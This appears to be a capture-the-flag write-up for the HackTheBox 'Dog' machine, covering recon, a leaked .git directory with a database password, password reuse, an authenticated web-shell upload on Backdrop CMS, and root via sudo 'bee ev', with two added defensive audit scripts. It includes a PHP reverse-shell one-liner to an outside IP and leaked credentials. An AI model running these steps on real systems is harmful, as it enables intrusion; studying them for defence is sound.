Dog

  • 🌐 Website: HackTheBox
  • 🔥 Level: Easy
  • 🖥️ OS: Linux
  • 🔗 Link: Dog

Foothold

target=10.10.11.58

$ nmap -sC -sV $target           
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 10:47 UTC
Nmap scan report for 10.10.11.58
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds

Notice that the website has a .git directory and uses Backdrop CMS.

------------------------------------------------------------------- ------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS                                   | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)           | php/webapps/51597.txt
------------------------------------------------------------------- ------------------------

User access

We can see an Authenticated RCE exploit. I try to dump the .git directory with git-dumper.

I find a settings.php file with these credentials: mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop
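
The foothold came from a served .git directory and a database URL with an inline password in settings.php. The following check for both conditions on a deployed web root is an added example, not part of the original writeup; the function names, the sample tree and its placeholder password are constructed for illustration.

```sh
# Added example, not from the original writeup.
# Prints one finding per line for the web root given as $1:
#   EXPOSED_VCS <dir>            version-control metadata inside the served tree
#   INLINE_DB_CREDENTIAL <file>  scheme://user:password@host in a PHP or JSON file
# Paths are relative to the web root; the matched password is never printed.
audit_webroot() (
    cd "$1" || exit 2
    # 1. Any VCS directory under the root lets a visitor rebuild the source tree.
    find . -type d \( -name .git -o -name .svn -o -name .hg \) -prune -print |
        sed 's|^\./|EXPOSED_VCS |'
    # 2. Config files with credentials embedded in a database URL
    #    (VCS directories are skipped; they are already reported above).
    find . \( -name .git -o -name .svn -o -name .hg \) -prune -o \
        -type f \( -name '*.php' -o -name '*.json' \) \
        -exec grep -lE '(mysql|mysqli|pgsql)://[^:/@ ]+:[^@ ]+@' {} + |
        sed 's|^\./|INLINE_DB_CREDENTIAL |'
)

# Builds a constructed sample tree (placeholder password) and prints its path.
make_sample_webroot() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/.git/refs" "$d/core"
    printf '%s\n' '<?php' \
        "\$database = 'mysql://root:CONSTRUCTED-PLACEHOLDER@127.0.0.1/backdrop';" \
        > "$d/settings.php"
    printf '%s\n' '<?php // no credentials here' > "$d/core/index.php"
    echo "$d"
}

sample=$(make_sample_webroot)
audit_webroot "$sample"
rm -rf "$sample"
```

Run against the document root before deployment, any output line means the tree should not be served as it is.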

I see a user named dogBackDropSystem on the website. Maybe this is his password? No, it isn't. I look for other users:

grep -r dog.htb
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000       commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000    commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Trying with tiffany. It works!

I use the script found in searchsploit, and it says to upload the generated shell at this link: http://dog.htb/?q=admin/modules/install.

But the website wants a tar.gz. So I unpacked shell.zip and repacked it to tar.gz.

And it worked. I follow the script's tip and go to http://dog.htb/modules/shell/shell.php.

Typing id:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

I gained a full interactive reverse shell:

www-data@dog:/var/www$ cd /home
www-data@dog:/home$ ls
jobert  johncusack
www-data@dog:/home$ ls jobert/
www-data@dog:/home$ ls johncusack/
test.php  user.txt
www-data@dog:/home$ cat johncusack/user.txt 
cat: johncusack/user.txt: Permission denied
www-data@dog:/home$ 
www-data@dog:/home$ ls -la johncusack/
total 36
drwxr-xr-x 4 johncusack johncusack 4096 Mar 14 10:16 .
drwxr-xr-x 4 root       root       4096 Aug 15  2024 ..
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  220 Aug 15  2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15  2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16  2024 .cache
drwxrwxr-x 3 johncusack johncusack 4096 Mar 14 10:15 .local
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  807 Aug 15  2024 .profile
-rw-rw-r-- 1 johncusack johncusack   27 Mar 14 10:16 test.php
-rw-r----- 1 root       johncusack   33 Mar 14 08:52 user.txt
www-data@dog:/home/johncusack$ cat test.php
<?php shell_exec("id"); ?>

Maybe one of these users has the same password?

johncusack:BackDropJ2024DS2024

Privesc

Running linpeas.sh:

                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
/usr/bin/ip-tools.sh

╔══════════╣ Unexpected in root
/backdrop_tool

Running sudo -l:

johncusack@dog:/tmp/lin$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

I run this script and see an interesting thing:

 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

I can try to execute code using ev.

johncusack@dog:/var/www/html$ sudo bee ev '$sock=fsockopen("10.10.14.49",9001);system("/bin/bash <&3 >&3 2>&3");'

It loads but the shell doesn't work. I try to cat the root flag directly:

johncusack@dog:/var/www/html$ sudo bee ev "system('cat /root/root.txt')"
9ec1abd8626{redacted}
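
The escalation works because the sudo rule names bee with no argument restriction and bee offers subcommands that run caller-supplied PHP or SQL. The audit below is an added example, not part of the original writeup: it flags such rules in `sudo -l` output and the matching help entries by keyword, which is a heuristic. Function names are hypothetical, and the sample input is abridged from the output above plus one constructed help entry.

```sh
# Added example, not from the original writeup.
# stdin: `sudo -l` output. Prints "<runas> <command>" for each rule whose
# command has no fixed arguments, so the caller picks the subcommand.
unrestricted_sudo_rules() {
    awk '
        /may run the following commands/ { in_rules = 1; next }
        in_rules && /^[ \t]+\(/ {
            runas = $0; sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
            gsub(/[ \t]/, "", runas)
            cmd = $0; sub(/^[^)]*\)[ \t]*/, "", cmd)
            sub(/^([A-Z_]+:[ \t]*)+/, "", cmd)      # drop tags such as NOPASSWD:
            if (cmd !~ /[ \t]/) print runas, cmd
        }'
}

# stdin: help text in the layout shown above (name indented two spaces,
# aliases and description three). Prints subcommands that run caller input.
code_exec_subcommands() {
    awk '
        /^  [^ ]/ { name = $1; next }
        /^   [^ ]/ && /Execute|Evaluate|command-line interface/ && name != "" {
            print name; name = ""
        }'
}

sample_sudo_l() {    # abridged from the sudo -l output in the writeup
    cat <<'EOF'
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
EOF
}

sample_help() {      # two entries from the writeup plus one constructed entry
    cat <<'EOF'
 ADVANCED
  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

  example-info
   Print site information (constructed entry).
EOF
}
sample_sudo_l | unrestricted_sudo_rules
sample_help | code_exec_subcommands
```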